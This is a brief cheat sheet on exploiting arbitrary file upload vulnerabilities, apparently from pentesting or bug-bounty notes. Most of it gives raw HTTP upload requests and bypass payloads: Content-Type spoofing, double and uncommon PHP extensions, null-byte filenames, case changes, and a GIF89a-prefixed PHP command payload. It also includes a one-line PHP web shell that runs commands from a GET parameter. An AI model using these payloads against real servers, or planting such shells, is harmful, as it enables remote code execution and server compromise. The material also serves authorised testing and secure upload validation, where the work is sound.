Arbitrary File Upload
Introduction
An arbitrary file upload vulnerability is a type of security flaw that allows an attacker to upload malicious files onto a server.
Where to find
In upload file feature, for example upload photo profile feature
How to exploit
-
Change the
Content-TypevalueChange the Content-TypePOST /images/upload/ HTTP/1.1 Host: target.com ... ---------------------------829348923824 Content-Disposition: form-data; name="uploaded"; filename="dapos.php" Content-Type: application/x-phpPOST /images/upload/ HTTP/1.1 Host: target.com ... ---------------------------829348923824 Content-Disposition: form-data; name="uploaded"; filename="dapos.php" Content-Type: image/jpeg -
Try to change the extension when send the request, for example in here you cant upload file with ext php but you can upload jpg file
Change the request to thisPOST /images/upload/ HTTP/1.1 Host: target.com ... ---------------------------829348923824 Content-Disposition: form-data; name="uploaded"; filename="dapos.php.jpg" Content-Type: application/x-phpPOST /images/upload/ HTTP/1.1 Host: target.com ... ---------------------------829348923824 Content-Disposition: form-data; name="uploaded"; filename="dapos.php" Content-Type: application/x-php -
Upload the payload, but start with GIF89a; and
And dont forget to change the content-type to image/gifPOST /images/upload/ HTTP/1.1 Host: target.com ... ---------------------------829348923824 Content-Disposition: form-data; name="uploaded"; filename="dapos.php" Content-Type: image/gif GIF89a; <?php system("id") ?> -
Bypass content length validation, it can be bypassed using small payload
(<?=`$_GET[x]`?>) -
Using null byte in filename
file.php%00.gif -
Using double extensions for the uploaded file
file.jpg.php -
Uploading an unpopular php extensions (php4,php5,php6,phtml)
file.php5 -
Try to randomly capitalizes the file extension
file.pHP5 -
Mix the tips!